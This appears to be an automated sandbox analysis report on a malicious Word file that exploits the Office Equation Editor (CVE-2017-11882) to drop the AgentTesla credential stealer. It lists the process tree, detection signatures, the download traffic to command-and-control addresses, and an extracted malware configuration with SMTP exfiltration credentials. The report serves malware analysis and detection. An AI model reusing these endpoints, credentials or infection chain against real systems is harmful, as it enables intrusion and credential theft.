Loading ...

Play interactive tourEdit tour

Analysis Report documenting.doc

Overview

General Information

Sample Name:documenting.doc
Analysis ID:345146
MD5:968781deb16a336c2fdda28c2ae1d7d6
SHA1:719ba0ec5623e1ee351fbf5ce8df4d0ad70d7939
SHA256:980a17c08dcaac6b16180863a7cd8a92b636622f513fd2847613b660a547ce71
Tags:doc

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
.NET source code contains very large array initializations
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2032 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2436 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • RegAskcfcd.exe (PID: 2508 cmdline: C:\Users\user\AppData\Roaming\RegAskcfcd.exe MD5: F82A16AC433034D92B1F2A4023DF6D6B)
      • RegAskcfcd.exe (PID: 2840 cmdline: C:\Users\user\AppData\Roaming\RegAskcfcd.exe MD5: F82A16AC433034D92B1F2A4023DF6D6B)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "EScTUb1bSXSbS1g", "URL: ": "https://FTIIlzumA5oOsjQq8.net", "To: ": "max.mccanna@metaltek.me", "ByHost: ": "mail.privateemail.com:587", "Password: ": "nz4iNiA", "From: ": "max.mccanna@metaltek.me"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2362272923.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000004.00000002.2110262554.00000000036FE000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000005.00000002.2363266312.00000000025F9000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000005.00000002.2363266312.00000000025F9000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000005.00000002.2362764617.0000000002161000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.RegAskcfcd.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

              Sigma Overview

              System Summary:

              barindex
              Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
              Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\RegAskcfcd.exe, CommandLine: C:\Users\user\AppData\Roaming\RegAskcfcd.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\RegAskcfcd.exe, NewProcessName: C:\Users\user\AppData\Roaming\RegAskcfcd.exe, OriginalFileName: C:\Users\user\AppData\Roaming\RegAskcfcd.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2436, ProcessCommandLine: C:\Users\user\AppData\Roaming\RegAskcfcd.exe, ProcessId: 2508
              Sigma detected: File Dropped By EQNEDT32EXEShow sources
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2436, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mexxxx[1].exe

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Found malware configurationShow sources
              Source: RegAskcfcd.exe.2840.5.memstrMalware Configuration Extractor: Agenttesla {"Username: ": "EScTUb1bSXSbS1g", "URL: ": "https://FTIIlzumA5oOsjQq8.net", "To: ": "max.mccanna@metaltek.me", "ByHost: ": "mail.privateemail.com:587", "Password: ": "nz4iNiA", "From: ": "max.mccanna@metaltek.me"}
              Multi AV Scanner detection for submitted fileShow sources
              Source: documenting.docVirustotal: Detection: 38%Perma Link
              Source: documenting.docReversingLabs: Detection: 43%

              Exploits:

              barindex
              Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\RegAskcfcd.exe
              Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

              Compliance:

              barindex
              Uses new MSVCR DllsShow sources
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Uses secure TLS version for HTTPS connectionsShow sources
              Source: unknownHTTPS traffic detected: 172.111.202.41:443 -> 192.168.2.22:49165 version: TLS 1.2
              Source: global trafficDNS query: name: cy.kl-re.com
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.111.202.41:443
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.111.202.41:443

              Networking:

              barindex
              C2 URLs / IPs found in malware configurationShow sources
              Source: Malware configuration extractorURLs: https://FTIIlzumA5oOsjQq8.net
              Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.54.122.60:587
              Source: global trafficHTTP traffic detected: GET /base/D6BA86F557F0B3BF28711AA5C7497D8B.html HTTP/1.1Host: 193.239.147.103Connection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 193.239.147.103 193.239.147.103
              Source: Joe Sandbox ViewIP Address: 198.54.122.60 198.54.122.60
              Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
              Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.54.122.60:587
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: unknownTCP traffic detected without corresponding DNS query: 193.239.147.103
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4385F6C0-FFD8-4816-B513-C2DC6937B540}.tmpJump to behavior
              Source: global trafficHTTP traffic detected: GET /base/D6BA86F557F0B3BF28711AA5C7497D8B.html HTTP/1.1Host: 193.239.147.103Connection: Keep-Alive
              Source: RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
              Source: unknownDNS traffic detected: queries for: cy.kl-re.com
              Source: RegAskcfcd.exe, 00000005.00000002.2362764617.0000000002161000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
              Source: RegAskcfcd.exe, 00000004.00000002.2107803267.0000000002161000.00000004.00000001.sdmpString found in binary or memory: http://193.239.147.103
              Source: RegAskcfcd.exe, 00000004.00000002.2107488897.000000000023C000.00000004.00000020.sdmp, RegAskcfcd.exe, 00000004.00000002.2107803267.0000000002161000.00000004.00000001.sdmpString found in binary or memory: http://193.239.147.103/base/D6BA86F557F0B3BF28711AA5C7497D8B.html
              Source: RegAskcfcd.exe, 00000005.00000002.2362764617.0000000002161000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
              Source: RegAskcfcd.exe, 00000005.00000002.2362764617.0000000002161000.00000004.00000001.sdmpString found in binary or memory: http://KYWxYV.com
              Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.2.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
              Source: RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpString found in binary or memory: http://ca.sia.
              Source: RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpString found in binary or memory: http://ca.sia.it/secsrv/repository/CRL.der0J
              Source: RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
              Source: RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
              Source: RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
              Source: RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/publicnotaryroot.crl0
              Source: RegAskcfcd.exe, 00000005.00000002.2367858636.0000000007520000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: RegAskcfcd.exe, 00000005.00000002.2362435990.00000000005FB000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/TrustedCertificateServices.crl0:
              Source: RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
              Source: RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
              Source: RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
              Source: RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: RegAskcfcd.exe, 00000005.00000002.2367858636.0000000007520000.00000004.00000001.sdmpString found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
              Source: RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
              Source: RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
              Source: RegAskcfcd.exe, 00000005.00000002.2367858636.0000000007520000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
              Source: RegAskcfcd.exe, 00000005.00000002.2362435990.00000000005FB000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
              Source: 77EC63BDA74BD0D0E0426DC8F8008506.2.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabr
              Source: RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
              Source: RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
              Source: RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
              Source: RegAskcfcd.exe, 00000005.00000002.2363134886.00000000024B8000.00000004.00000001.sdmpString found in binary or memory: http://mail.privateemail.com
              Source: RegAskcfcd.exe, 00000005.00000002.2367858636.0000000007520000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
              Source: RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
              Source: RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
              Source: RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
              Source: RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
              Source: RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
              Source: RegAskcfcd.exe, 00000005.00000002.2367858636.0000000007520000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
              Source: RegAskcfcd.exe, 00000005.00000002.2367858636.0000000007520000.00000004.00000001.sdmpString found in binary or memory: http://repository.swisssign.com/0
              Source: RegAskcfcd.exe, 00000004.00000002.2115088871.00000000053C0000.00000002.00000001.sdmp, RegAskcfcd.exe, 00000005.00000002.2366590454.00000000059D0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
              Source: RegAskcfcd.exe, 00000004.00000002.2107803267.0000000002161000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: RegAskcfcd.exe, 00000004.00000002.2115088871.00000000053C0000.00000002.00000001.sdmp, RegAskcfcd.exe, 00000005.00000002.2366590454.00000000059D0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
              Source: RegAskcfcd.exe, 00000005.00000002.2367858636.0000000007520000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/certic-
              Source: RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpString found in binary or memory: http://www.chambersign.org1
              Source: RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpString found in binary or memory: http://www.comsign.co.il/cps0
              Source: RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
              Source: RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
              Source: RegAskcfcd.exe, 00000005.00000002.2367858636.0000000007520000.00000004.00000001.sdmpString found in binary or memory: http://www.dnie.es/dpc0
              Source: RegAskcfcd.exe, 00000005.00000002.2367858636.0000000007520000.00000004.00000001.sdmpString found in binary or memory: http://www.e-trust.be/CPS/QNcerts
              Source: RegAskcfcd.exe, 00000005.00000002.2367858636.0000000007520000.00000004.00000001.sdmpString found in binary or memory: http://www.globaltrust.info0
              Source: RegAskcfcd.exe, 00000005.00000002.2367858636.0000000007520000.00000004.00000001.sdmpString found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
              Source: RegAskcfcd.exe, 00000005.00000002.2367858636.0000000007520000.00000004.00000001.sdmpString found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
              Source: RegAskcfcd.exe, 00000005.00000002.2367858636.0000000007520000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
              Source: RegAskcfcd.exe, 00000005.00000002.2363266312.00000000025F9000.00000004.00000001.sdmpString found in binary or memory: https://FTIIlzumA5oOsjQq8.ne
              Source: RegAskcfcd.exe, 00000005.00000002.2363266312.00000000025F9000.00000004.00000001.sdmpString found in binary or memory: https://FTIIlzumA5oOsjQq8.net
              Source: RegAskcfcd.exe, 00000005.00000002.2367858636.0000000007520000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
              Source: RegAskcfcd.exe, 00000005.00000002.2367858636.0000000007520000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
              Source: RegAskcfcd.exe, 00000005.00000002.2367858636.0000000007520000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
              Source: RegAskcfcd.exe, 00000005.00000002.2367858636.0000000007520000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.hu/docs/
              Source: RegAskcfcd.exeString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
              Source: RegAskcfcd.exe, 00000005.00000002.2362764617.0000000002161000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
              Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
              Source: unknownHTTPS traffic detected: 172.111.202.41:443 -> 192.168.2.22:49165 version: TLS 1.2
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeWindow created: window name: CLIPBRDWNDCLASS
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15AJump to dropped file

              System Summary:

              barindex
              .NET source code contains very large array initializationsShow sources
              Source: 5.2.RegAskcfcd.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b2C633227u002dE84Au002d4536u002dA7C4u002dFC7E73DD21F9u007d/E67914C9u002d0A0Au002d4135u002dAA51u002d138DF3932497.csLarge array initialization: .cctor: array initializer size 11938
              Office equation editor drops PE fileShow sources
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mexxxx[1].exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\RegAskcfcd.exeJump to dropped file
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeMemory allocated: 76E20000 page execute and read and write
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeMemory allocated: 76D20000 page execute and read and write
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeMemory allocated: 76E20000 page execute and read and write
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeMemory allocated: 76D20000 page execute and read and write
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeCode function: 5_2_003F6358
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeCode function: 5_2_003F5340
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeCode function: 5_2_003F5688
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeCode function: 5_2_003F2099
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeCode function: 5_2_00CD0DE0
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeCode function: 5_2_041C0048
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeCode function: 5_2_041C3470
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeCode function: 5_2_041CAA98
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeCode function: 5_2_041CBCB8
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeCode function: 5_2_041C9CE8
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeCode function: 5_2_041C8110
              Source: 5.2.RegAskcfcd.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: 5.2.RegAskcfcd.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@6/15@9/3
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$cumenting.docJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCA6F.tmpJump to behavior
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Roaming\RegAskcfcd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: documenting.docVirustotal: Detection: 38%
              Source: documenting.docReversingLabs: Detection: 43%
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
              Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\RegAskcfcd.exe C:\Users\user\AppData\Roaming\RegAskcfcd.exe
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\RegAskcfcd.exe C:\Users\user\AppData\Roaming\RegAskcfcd.exe
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\RegAskcfcd.exe C:\Users\user\AppData\Roaming\RegAskcfcd.exe
